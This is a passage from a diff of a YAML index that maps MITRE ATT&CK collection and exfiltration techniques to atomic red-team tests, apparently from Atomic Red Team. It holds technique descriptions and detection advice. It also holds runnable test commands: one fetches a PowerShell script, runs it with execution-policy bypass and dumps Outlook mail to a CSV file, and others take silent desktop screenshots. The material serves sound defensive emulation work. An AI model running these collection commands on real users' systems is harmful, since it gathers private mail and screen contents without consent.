local system, such as Outlook storage or cache files. - - Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\Users\\Documents\Outlook Files` or `C:\Users\\AppData\Local\Microsoft\Outlook`.(Citation: Microsoft Outlook Files) - name: Local Email Collection - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1114.001 - url: https://attack.mitre.org/techniques/T1114/001 - - source_name: Outlook File Sizes - url: https://practical365.com/clients/office-365-proplus/outlook-cached-mode-ost-file-sizes/ - description: N. O'Bryan. (2018, May 30). Managing Outlook Cached Mode and - OST File Sizes. Retrieved February 19, 2020. - - source_name: Microsoft Outlook Files - url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790 - description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and - .ost). Retrieved February 19, 2020. - x_mitre_platforms: - - Windows - x_mitre_data_sources: - - Process monitoring - - File monitoring - - Authentication logs - - Mail server - x_mitre_detection: Monitor processes and command-line arguments for actions - that could be taken to gather local email files. Monitor for unusual processes - accessing local email files. Remote access tools with built-in features may - interact directly with the Windows API to gather information. Information - may also be acquired through Windows system management tools such as [Windows - Management Instrumentation](https://attack.mitre.org/techniques/T1047) and - [PowerShell](https://attack.mitre.org/techniques/T1059/001). - x_mitre_permissions_required: - - User - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1114.001 - atomic_tests: - - name: Email Collection with PowerShell Get-Inbox - auto_generated_guid: 3f1b5096-0139-4736-9b78-19bcb02bb1cb - description: | - Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration. - Successful execution will produce stdout message stating "Please be patient, this may take some time...". Upon completion, final output will be a mail.csv file. - - Note: Outlook is required, but no email account necessary to produce artifacts. - supported_platforms: - - windows - input_arguments: - output_file: - description: Output file path - type: String - default: "$env:TEMP\\mail.csv" - file_path: - description: File path for Get-Inbox.ps1 - type: String - default: PathToAtomicsFolder\T1114.001\src - dependency_executor_name: powershell - dependencies: - - description: 'Get-Inbox.ps1 must be located at #{file_path} - -' - prereq_command: 'if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit - 1} - -' - get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/src/Get-Inbox.ps1" - -OutFile "#{file_path}\Get-Inbox.ps1" - -' - executor: - command: 'powershell -executionpolicy bypass -command #{file_path}\Get-Inbox.ps1 - -file #{output_file} - -' - cleanup_command: 'Remove-Item #{output_file} -Force -ErrorAction Ignore - -' - name: powershell - T1185: - technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - url: https://attack.mitre.org/techniques/T1185 - external_id: T1185 - - url: https://en.wikipedia.org/wiki/Man-in-the-browser - description: Wikipedia. (2017, October 28). Man-in-the-browser. Retrieved - January 10, 2018. - source_name: Wikipedia Man in the Browser - - url: https://www.cobaltstrike.com/help-browser-pivoting - description: Mudge, R. (n.d.). Browser Pivoting. Retrieved January 10, 2018. - source_name: Cobalt Strike Browser Pivot - - url: https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses - description: De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME - EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL - BUSINESSES. Retrieved January 17, 2018. - source_name: ICEBRG Chrome Extensions - - url: https://cobaltstrike.com/downloads/csmanual38.pdf - description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. - Retrieved May 24, 2017. - source_name: cobaltstrike manual - description: |- - Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser) - - A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser Pivot) (Citation: ICEBRG Chrome Extensions) - - Browser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication. (Citation: cobaltstrike manual) - name: Man in the Browser - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-07-14T19:39:44.590Z' - created: '2018-01-16T16:13:52.465Z' - x_mitre_is_subtechnique: false - x_mitre_version: '1.0' - x_mitre_contributors: - - Justin Warner, ICEBRG - x_mitre_data_sources: - - Authentication logs - - Packet capture - - Process monitoring - - API monitoring - x_mitre_detection: This is a difficult technique to detect because adversary - traffic would be masked by normal user traffic. No new processes are created - and no additional software touches disk. Authentication logs can be used to - audit logins to specific web applications, but determining malicious logins - versus benign logins may be difficult if activity matches typical user behavior. - Monitor for process injection against browser applications - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_platforms: - - Windows - atomic_tests: [] - T1557: - technique: - external_references: - - source_name: mitre-attack - external_id: T1557 - url: https://attack.mitre.org/techniques/T1557 - - external_id: CAPEC-94 - source_name: capec - url: https://capec.mitre.org/data/definitions/94.html - - source_name: Rapid7 MiTM Basics - url: https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/ - description: Rapid7. (n.d.). Man-in-the-Middle (MITM) Attacks. Retrieved March - 2, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Man-in-the-Middle - description: |- - Adversaries may attempt to position themselves between two or more networked devices using a man-in-the-middle (MiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics) - - Adversaries may leverage the MiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service. - id: attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: credential-access - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-03-31T13:54:08.535Z' - created: '2020-02-11T19:07:12.114Z' - x_mitre_contributors: - - Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project - x_mitre_detection: Monitor network traffic for anomalies associated with known - MiTM behavior. Consider monitoring for modifications to system configuration - files involved in shaping network traffic flow. - x_mitre_data_sources: - - File monitoring - - Netflow/Enclave netflow - - Packet capture - x_mitre_permissions_required: - - User - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Windows - - macOS - - Linux - atomic_tests: [] - T1074.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1074.002 - url: https://attack.mitre.org/techniques/T1074/002 - - source_name: Mandiant M-Trends 2020 - url: https://content.fireeye.com/m-trends/rpt-m-trends-2020 - description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved - April 24, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Remote Data Staging - description: |- - Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location. - - In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020) - - By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection. - id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-06-24T18:59:15.833Z' - created: '2020-03-13T21:14:58.206Z' - x_mitre_contributors: - - Praetorian - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_detection: |- - Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. - - Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring - x_mitre_platforms: - - Linux - - macOS - - Windows - - AWS - - GCP - - Azure - atomic_tests: [] - T1114.002: - technique: - created: '2020-02-19T18:52:24.547Z' - modified: '2020-02-19T20:53:50.908Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - type: attack-pattern - id: attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a - description: Adversaries may target an Exchange server or Office 365 to collect - sensitive information. Adversaries may leverage a user's credentials and interact - directly with the Exchange server to acquire information from within a network. - Adversaries may also access externally facing Exchange services or Office - 365 to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) - can be used to automate searches for specific keywords. - name: Remote Email Collection - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1114.002 - url: https://attack.mitre.org/techniques/T1114/002 - x_mitre_platforms: - - Office 365 - - Windows - x_mitre_data_sources: - - Authentication logs - - Email gateway - - Mail server - - Office 365 trace logs - x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal - locations, especially for privileged accounts (ex: Exchange administrator - account).' - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - atomic_tests: [] - T1113: - technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1113 - url: https://attack.mitre.org/techniques/T1113 - - external_id: CAPEC-648 - source_name: capec - url: https://capec.mitre.org/data/definitions/648.html - - source_name: CopyFromScreen .NET - url: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8 - description: Microsoft. (n.d.). Graphics.CopyFromScreen Method. Retrieved - March 24, 2020. - - url: https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/ - description: Thomas Reed. (2017, January 18). New Mac backdoor using antiquated - code. Retrieved July 5, 2017. - source_name: Antiquated Mac Malware - description: 'Adversaries may attempt to take screen captures of the desktop - to gather information over the course of an operation. Screen capturing functionality - may be included as a feature of a remote access tool used in post-compromise - operations. Taking a screenshot is also typically possible through native - utilities or API calls, such as CopyFromScreen, xwd, - or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated - Mac Malware) - -' - name: Screen Capture - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-03-24T19:56:37.627Z' - created: '2017-05-31T21:31:25.060Z' - x_mitre_is_subtechnique: false - x_mitre_version: '1.1' - x_mitre_data_sources: - - API monitoring - - Process monitoring - - File monitoring - x_mitre_detection: Monitoring for screen capture behavior will depend on the - method used to obtain data from the operating system and write output files. - Detection methods could include collecting information from unusual processes - using API calls used to obtain image data, and monitoring for image files - written to disk. The sensor data may need to be correlated with other events - to identify malicious activity, depending on the legitimacy of this behavior - within a given network environment. - x_mitre_platforms: - - Linux - - macOS - - Windows - identifier: T1113 - atomic_tests: - - name: Screencapture - auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac - description: 'Use screencapture command to collect a full desktop screenshot - -' - supported_platforms: - - macos - input_arguments: - output_file: - description: Output file path - type: Path - default: "/tmp/T1113_desktop.png" - executor: - command: 'screencapture #{output_file} - -' - cleanup_command: 'rm #{output_file} - -' - name: bash - - name: Screencapture (silent) - auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 - description: 'Use screencapture command to collect a full desktop screenshot - -' - supported_platforms: - - macos - input_arguments: - output_file: - description: Output file path - type: Path - default: "/tmp/T1113_desktop.png" - executor: - command: 'screencapture -x #{output_file} - -' - cleanup_command: 'rm #{output_file} - -' - name: bash - - name: X Windows Capture - auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac - description: 'Use xwd command to collect a full desktop screenshot and review - file with xwud - -' - supported_platforms: - - linux - input_arguments: - output_file: - description: Output file path - type: Path - default: "/tmp/T1113_desktop.xwd" - executor: - command: | - xwd -root -out #{output_file} - xwud -in #{output_file} - cleanup_command: 'rm #{output_file} - -' - name: bash - - name: Capture Linux Desktop using Import Tool - auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1 - description: 'Use import command from ImageMagick to collect a full desktop - screenshot - -' - supported_platforms: - - linux - input_arguments: - output_file: - description: Output file path - type: Path - default: "/tmp/T1113_desktop.png" - dependencies: - - description: 'ImageMagick must be installed - -' - prereq_command: 'if import --version; then exit 0; else exit 1; fi - -' - get_prereq_command: 'sudo apt-get -y install imagemagick - -' - executor: - command: 'import -window root #{output_file} - -' - cleanup_command: 'rm #{output_file} - -' - name: bash - - name: Windows Screencapture - auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153 - description: 'Use Psr.exe binary to collect screenshots of user display. Test - will do left mouse click to simulate user behaviour - -' - supported_platforms: - - windows - input_arguments: - output_file: - description: Output file path - type: Path - default: c:\temp\T1113_desktop.zip - recording_time: - description: Time to take screenshots - type: String - default: 5 - executor: - name: powershell - elevation_required: false - command: | - cmd /c start /b psr.exe /start /output #{output_file} /sc 1 /gui 0 /stopevent 12 - Add-Type -MemberDefinition '[DllImport("user32.dll")] public static extern void mouse_event(int flags, int dx, int dy, int cButtons, int info);' -Name U32 -Namespace W; - [W.U32]::mouse_event(0x02 -bor 0x04 -bor 0x01, 0, 0, 0, 0); - cmd /c "timeout #{recording_time} > NULL && psr.exe /stop" - cleanup_command: 'rm #{output_file} -ErrorAction Ignore' - T1213.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1213.002 - url: https://attack.mitre.org/techniques/T1213/002 - - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2 - description: Microsoft. (2017, July 19). Configure audit settings for a site - collection. Retrieved April 4, 2018. - source_name: Microsoft SharePoint Logging - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Sharepoint - description: | - Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint: - - * Policies, procedures, and standards - * Physical / logical network diagrams - * System architecture diagrams - * Technical system documentation - * Testing / development credentials - * Work / project schedules - * Source code snippets - * Links to network shares and other internal resources - id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-03-24T16:41:00.821Z' - created: '2020-02-14T13:35:32.938Z' - x_mitre_detection: "The user access logging within Microsoft's SharePoint can - be configured to report access to certain pages and documents. (Citation: - Microsoft SharePoint Logging). As information repositories generally have - a considerably large user base, detection of malicious use can be non-trivial. - At minimum, access to information repositories performed by privileged users - (for example, Active Directory Domain, Enterprise, or Schema Administrators) - should be closely monitored and alerted upon, as these types of accounts should - not generally used to access information repositories. If the capability exists, - it may be of value to monitor and alert on users that are retrieving and viewing - a large number of documents and pages; this behavior may be indicative of - programmatic means being used to retrieve all data within the repository. - In environments with high-maturity, it may be possible to leverage User-Behavioral - Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n" - x_mitre_data_sources: - - Office 365 audit logs - - Authentication logs - - Application logs - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_platforms: - - Windows - - Office 365 - atomic_tests: [] - T1125: - technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - url: https://attack.mitre.org/techniques/T1125 - external_id: T1125 - - external_id: CAPEC-634 - source_name: capec - url: https://capec.mitre.org/data/definitions/634.html - - url: https://objective-see.com/blog/blog_0x25.html - description: Patrick Wardle. (n.d.). Retrieved March 20, 2018. - source_name: objective-see 2017 review - description: |- - An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files. - - Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen. - - In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review) - name: Video Capture - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-07-14T19:40:47.644Z' - created: '2017-05-31T21:31:37.917Z' - x_mitre_is_subtechnique: false - x_mitre_version: '1.0' - x_mitre_contributors: - - Praetorian - x_mitre_data_sources: - - Process monitoring - - File monitoring - - API monitoring - x_mitre_detection: |- - Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system. - - Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data. - x_mitre_permissions_required: - - User - x_mitre_platforms: - - Windows - - macOS - atomic_tests: [] - T1056.003: - technique: - created: '2020-02-11T18:59:50.058Z' - modified: '2020-03-24T21:16:16.580Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - - kill_chain_name: mitre-attack - phase_name: credential-access - type: attack-pattern - id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e - description: |- - Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service. - - This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging) - name: Web Portal Capture - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1056.003 - url: https://attack.mitre.org/techniques/T1056/003 - - external_id: CAPEC-569 - source_name: capec - url: https://capec.mitre.org/data/definitions/569.html - - url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/ - description: 'Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco - Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.' - source_name: Volexity Virtual Private Keylogging - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_detection: File monitoring may be used to detect changes to files in - the Web directory for organization login pages that do not match with authorized - updates to the Web server's content. - x_mitre_data_sources: - - File monitoring - x_mitre_system_requirements: - - An externally facing login portal is configured. - atomic_tests: [] exfiltration: T1020: technique: @@ -53690,13 +59328,14 @@ exfiltration: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: exfiltration - modified: '2020-03-11T13:58:08.219Z' + modified: '2020-10-22T02:24:54.881Z' created: '2017-05-31T21:30:29.458Z' x_mitre_is_subtechnique: false x_mitre_platforms: - Linux - macOS - Windows + - Network x_mitre_network_requirements: true x_mitre_detection: Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems @@ -53705,7 +59344,7 @@ exfiltration: - File monitoring - Process monitoring - Process use of network - x_mitre_version: '1.1' + x_mitre_version: '1.2' identifier: T1020 atomic_tests: - name: IcedID Botnet HTTP PUT @@ -53821,8 +59460,25 @@ exfiltration: name: sh T1048: technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2017-05-31T21:30:44.720Z' + modified: '2020-03-28T00:50:31.548Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: exfiltration + type: attack-pattern + id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Exfiltration Over Alternative Protocol + description: "Adversaries may steal data by exfiltrating it over a different + protocol than that of the existing command and control channel. The data may + also be sent to an alternate network location from the main command and control + server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any + other network protocol not being used as the main command and control channel. + Different protocol channels could also include Web services such as cloud + storage. Adversaries may also opt to encrypt and/or obfuscate these alternate + channels. \n\n[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) + can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB + or FTP.(Citation: Palo Alto OilRig Oct 2016) " external_references: - source_name: mitre-attack external_id: T1048 @@ -53835,46 +59491,29 @@ exfiltration: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 - description: "Adversaries may steal data by exfiltrating it over a different - protocol than that of the existing command and control channel. The data may - also be sent to an alternate network location from the main command and control - server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any - other network protocol not being used as the main command and control channel. - Different protocol channels could also include Web services such as cloud - storage. Adversaries may also opt to encrypt and/or obfuscate these alternate - channels. \n\n[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) - can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB - or FTP.(Citation: Palo Alto OilRig Oct 2016) " - name: Exfiltration Over Alternative Protocol - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: exfiltration - modified: '2020-03-28T00:50:31.548Z' - created: '2017-05-31T21:30:44.720Z' - x_mitre_version: '1.2' - x_mitre_data_sources: - - Process monitoring - - Process use of network - - Packet capture - - Netflow/Enclave netflow - - Network protocol analysis + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_is_subtechnique: false + x_mitre_contributors: + - Alfredo Abarca + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_network_requirements: true x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)' - x_mitre_network_requirements: true - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_contributors: - - Alfredo Abarca - x_mitre_is_subtechnique: false + x_mitre_data_sources: + - Process monitoring + - Process use of network + - Packet capture + - Netflow/Enclave netflow + - Network protocol analysis + x_mitre_version: '1.2' identifier: T1048 atomic_tests: - name: Exfiltration Over Alternative Protocol - SSH @@ -54017,18 +59656,8 @@ exfiltration: atomic_tests: [] T1041: technique: - created: '2017-05-31T21:30:41.804Z' - modified: '2020-03-12T15:59:47.470Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: exfiltration - type: attack-pattern - id: attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Exfiltration Over C2 Channel - description: Adversaries may steal data by exfiltrating it over an existing - command and control channel. Stolen data is encoded into the normal communications - channel using the same protocol as command and control communications. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1041 @@ -54037,26 +59666,36 @@ exfiltration: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_network_requirements: true + description: Adversaries may steal data by exfiltrating it over an existing + command and control channel. Stolen data is encoded into the normal communications + channel using the same protocol as command and control communications. + name: Exfiltration Over C2 Channel + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: exfiltration + modified: '2020-03-12T15:59:47.470Z' + created: '2017-05-31T21:30:41.804Z' + x_mitre_is_subtechnique: false + x_mitre_version: '2.0' + x_mitre_data_sources: + - Packet capture + - Process use of network + - Netflow/Enclave netflow + - Process monitoring x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)' - x_mitre_data_sources: - - Packet capture - - Process use of network - - Netflow/Enclave netflow - - Process monitoring - x_mitre_version: '2.0' - x_mitre_is_subtechnique: false + x_mitre_network_requirements: true + x_mitre_platforms: + - Linux + - macOS + - Windows atomic_tests: [] T1011: technique: @@ -54194,18 +59833,13 @@ exfiltration: atomic_tests: [] T1048.003: technique: - external_references: - - source_name: mitre-attack - external_id: T1048.003 - url: https://attack.mitre.org/techniques/T1048/003 - - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf - description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command - & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. - source_name: University of Birmingham C2 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol + created: '2020-03-15T15:37:47.583Z' + modified: '2020-03-28T00:50:31.361Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: exfiltration + type: attack-pattern + id: attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b description: "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command @@ -54214,31 +59848,36 @@ exfiltration: (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. " - id: attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: exfiltration - modified: '2020-03-28T00:50:31.361Z' - created: '2020-03-15T15:37:47.583Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_network_requirements: true + name: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1048.003 + url: https://attack.mitre.org/techniques/T1048/003 + - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf + description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command + & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. + source_name: University of Birmingham C2 + x_mitre_platforms: + - Linux + - macOS + 